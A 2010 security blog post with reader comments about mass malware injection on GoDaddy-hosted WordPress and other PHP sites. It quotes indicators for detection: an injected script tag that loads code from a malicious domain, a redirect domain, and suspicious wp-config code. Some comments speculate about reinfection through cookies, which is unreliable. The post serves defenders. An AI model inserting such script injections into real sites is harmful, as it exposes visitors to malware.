On May 1, 2010, Hosting providers were hacked again with malicious attacks similar to last month containing the kdjkfjskdfjlskdjf dot com code. WPSecurityLock has reported several sites that have been hacked for a second time. The variation appears to be the same script redirecting to different domains.
The recent attacks on self-hosted WordPress blog sites has expanded to the Joomla and Pligg platforms as well as WordPress. These latest attacks show the need for security hardening of all sites. WPSecurityLock recommends strong passwords and appropriate file permissions as well as putting in robust security measures. Webmasters are responsible for securing their sites. The hosting companies must have vulnerabilities that need to be closed.
At 8:00 am (CST) on May 1, 2010, We, at WPSecurityLock, have reported this current issue to Godaddy's Information Security Operations department. We are awaiting feedback and will share it with you on this post as soon as it arrives.
For information on how to remove this dangerous malware on your Godaddy Linux hosting account, see this article for instructions -
Cechirecom.com.js.php - WordPress Hacked | Case Study
Please check your website and see if it redirects you to an unwanted website. Or look in your source code for the following malicious code located above the </body> tag:
<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>
And redirects to: protectsys28-pd.xorg.pl...
This malware tries to send a virus to your visitor's computer. Here's a screenshot of what was blocked by my *AVG program:
For WordPress Hacked Site cleanup and security enhancements use our contact form.
UPDATE 5/1/2010 at 11:20 am CST: We have heard from Godaddy and they are aware and are investigating right now! As soon as they give us new information, we will update this post to keep you informed.
If you're site has been infected, please send us an email with your domain name and date and time you were attacked so we can continue to send reports to Godaddy. We want to help as much as we can to help you.
UPDATE: 5/1/2010 at 1:20pm CST: If your website has been infected and is not using WordPress, please email us your domain name so we can have it checked.
UPDATE 5/1/2010 at 3:09 pm CST: We just found some mystery files and code.
CAUTION: We just found some weird code in a WordPress wp-config.php file. This code was injected on April 21 on a site we are fixing now.
$GLOBALS['mr_no'] = 1;
We also found a mystery file in the root: test-soc.php,which contains the base64_decode script.
Please check your websites for this now.
If anyone has information as to what this is, please let us know.
UPDATE 5/1/2010 at 3:10pm CST: Salem, from Godaddy.com, has left a comment below. Here's the latest update from Godaddy...
We've been in contact with WPSecurityLock.com and we're actively working with them to identify the issue and resolve it. Further, we've published steps to correct the issue at http://fwd4.me/MFK .
Please note that we also investigated and found the cause of the issue last week, and while there are similarities, we're treating this as a new and separate issue.
As we continue to investigate the matter, our Security Team has noted that reports of sites with this malware on other CMS applications have the commonality that part of the site is powered by WordPress.
Again, we are actively and aggressively working to identify the cause and we've published a means to correct it - http://fwd4.me/MFK .
^Salem
UPDATE 5/3/2010 at 2:00pm CST: We have a conference call with the Godaddy team later this afternoon. We will keep you posted on the outcome.
We have received thousands of emails information about websites being hacked. We truly appreciate you contacting us. We will respond as fast as humanly possible.
UPDATE 5/3/2010 at 7:13pm CST: Go Daddy cares! Here's some info...
UPDATE 5/5/2010 at 3:00pm CST: We'd like to thank Scott from Go Daddy's IT Security Operations department for speaking at our teleseminar today. The audio replay is now available on the webcast page. If you missed this event, you can still register here and listen to the replay.
Scott has provided the following helpful links for you:
How to identify the version of WordPress you're using: http://community.godaddy.com/groups/go-daddy-hosting-connection/forum/topic/is-my-wordpress-version-up-to-date/
Our community thread on best practices for cleaning: http://community.godaddy.com/groups/go-daddy-hosting-connection/forum/topic/wordpress-compromisedhhow-to-fix-it
Upgrading WordPress the "best practice" way:
http://help.godaddy.com/article/6072
Form to contact our Security Team:
www.godaddy.com/securityissue
UPDATE 5/5/2010 at 5:00 pm CST: We have just uploaded a portion of today's WordPress Security Teleseminar with Scott from Go Daddy. You can listen to the audio by pressing the play button below:
Audio clip: Adobe Flash Player (version 9 or above) is required to play this audio clip. Download the latest version here. You also need to have JavaScript enabled in your browser.
We need your help...
In order to help spread awareness about this malware attack, click the share button below to link this post to your Twitter, Facebook, email, etc.
If you have any questions or have any further information about this malicious malware, please leave a comment below so that we can keep our readers informed.
Get Secure! Stay Secure!
Allen Dresser
Internet Tech Guy
www.internettechguy.com
http://twitter.com/internettechguy
Follow WPSecurityLock on Twitter
REGISTER NOW TO LISTEN TO THE AUDIO REPLAY WITH GO DADDY AND WPSECURITYLOCK!
You can still listen our WordPress Security Teleseminar Replay with special guest, Scott from Go Daddy recorded on May 5, 2010. Plus, you can still sign up for our May 19, 2010 at 9pm EST teleseminar. You can participate live from anywhere in the world. Click Here To Register Now!
*Denotes our affiliate link, see our Disclosure.
Please, review this topic:
http://www.simplemachines.org/community/index.php?topic=307717.0
Any news on this? I see from Kristi above that she not only used the GoDaddy restore feature but went in and did a reinstall of WordPress and STILL got re-infected. Please explain to me how this is not a GoDaddy issue?
I spent last night researching new hosts, and if anyone can point me to some good choices I would appreciate it. Will be migrating quickly before this happens again.
I'm pretty sure it is a hosting issue, but at the same time, other hosting companies have had this problem as well (recently Network Solutions, but I don't know if they're related to Godaddy). So sure, you can migrate elsewhere, but be sure to do a lot of research - every hosting company comes with its issues, whether they are security vulnerabilities, lack of backups when servers go down, billing issues, slow support, etc.
Good point. They all do have their issues.
My problem here is that GoDaddy has not reached out to its customers, and they have basically blown everyone off by pointing the blame towards WordPress (or the WP users themselves.)
Amazing that the mass attacks early Saturday morning were ALL on GoDaddy hosting. That screams "It's a GoDaddy problem" to me.
I've been a long time customer, and I would have preferred to stay with them. All they would have had to do was say "hey, we're going to help you through this. Thank you for the thousands of dollars you've spent with us. We care about your online business and we are going to find out who did this and then tighten up our end to make sure this vulnerability is fixed."
Such a let down from a company I trusted with my livelihood.
We have a conference call with Godaddy today. We will certainly give you an update on this post as soon as we have one.
Yup ... they got the same sites of mine that they got last time. I'm really curious about GoDaddy's suggestion that we all reinstall WordPress with a fresh copy. Let's set aside for a moment the fact that many people who were hacked were running the latest version of WP, and had multiple security plugins installed, and had good passwords. If we reinstall, what do we do about about the .php files that are part of our themes? We can't do away with those files.
Hi Steve, thanks for this information. I just called GoDaddy and the man told me that this is more of WordPress' situation. I don't know where to get help, because I've gone to WordPress forums and asked three times over the weekend but no one has replied.
I think my site was hacked over the weekend. Some of the symptoms I noticed were whenever I press Submit Reply to my comments, a red square appears. Even though the comment goes through on the website, it doesn't go through when I'm replying. Another thing is that I can no longer upload images to my posts. The site also runs a little slower than normal. Finally, the Dashboard didn't look like it used to when I open it up on Firefox.
Everything pretty much worked okay before this weekend, but do you guys think these symptoms are due to the hack that is described in this post?
What you have to do is manually clean any files that you don't want to delete during the reinstall, which includes the wp-config file, custom wp-config file (if you moved it into the wp-includes folder as security sites suggest), and your theme php files.
What I ended up doing was deleting the wp-admin and replacing the folder with the clean WordPress install files, deleting the root WordPress install files (except wp-config) and replacing them, deleting everything in wp-includes except my custom wp-config file and replacing them, deleting everything in the wp-content / plugins folder and replacing them, deleting default & classic theme files wp-content / themes and cleaning my custom / in use theme files manually.
Pretty much, you have two options with any php file on your hacked hosted site - delete and replace with a clean copy, or open it and remove the PHP code. This last cleanup was much easier for me because I had made a clean copy backup of everything from the last time it was all hacked, but the first time, it was many, many hours of cleanup and figuring out what I had to replace, reinstall, reactivate, etc.
It is NOT just WordPress or CMS sites. Ours is just a simple php site, and it was hacked identically to the other reports. I'm sure GoDaddy was hoping that the problem was with WP because the easiest out for them is to blame the problem on someone else. Despite the fact that they are well aware (I brought it to their attention!) that it is apparently any site with PHP page extensions that was hacked, they continue to push the line that it is something to do with WP. If I were WordPress I would consider legal action against GoDaddy for blaming them for a GoDaddy security lapse. GoDaddy support blew me off completely and I am totally angry about it.
Regina, something maybe quite important - my GoDaddy-hosted WordPress blog was hacked again on Saturday, the second time in 16 days (Ninoplas). I thought for sure I closed any/all security holes the first time, so couldn't understand how it happened again. I was looking and researching for hours on how it got in again, and then finally I stumbled upon this small paragraph in your text at the top of another page on your site:
"If not removed, this malicious script has a cookie that will run again in 20 days."
(http://www.wpsecuritylock.com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/)
I'm the kind of guy who NEVER clears my cookies, as I find them too convenient for keeping settings, logins etc - and always thought they weren't any real kind of security risk. But could it be that I - and all the others here - who got *reinfected* fell victim to a little-known, under-publicized secret backdoor on these things via *a browser cookie* ??
Hi JohnR,
Thanks for your comment. I would suggest cleaning your cookies and cache when you close your browsers as opposed to convenience. Although, I wish I didn't have too. Better safe than sorry.
I am not sure, at this time, if the 20-day cookie has to do with this most recent attack.
We are posting a press release in a few minutes we've received from Godaddy. So make sure you watch for that.
GoDaddy isn't being honest... it's all PHP that is affected, the only reason WP is getting the most attention is because that's the most widely used PHP application. My vBulletin on Godaddy was also victim to this same hack, second time in about 3 weeks. Multiple phone calls to Godaddy and all they will do is try and blame WP. Total BS... there is inadequate security on their server side that is permitting this.
Go Daddy cares! Here's some info...
This really ticks me off!
The is the second time in a month that my GoDaddy hosted site was compromised. I must have made 20 phone calls to them this past weekend. Each person I spoke with gave me the disclaimer that they are not in the WP business. Way to pass responsibility off GD. Seems to me that GD should be the ones to remove the base64 crud. Do you think the average person they market to actually understands all of this?
The malware code was in every PHP file. I finally had to reinstall WP, set my history back a week and delete my entire template. Yes, everything was the latest up to date version.
I'm looking for hosting with WP support.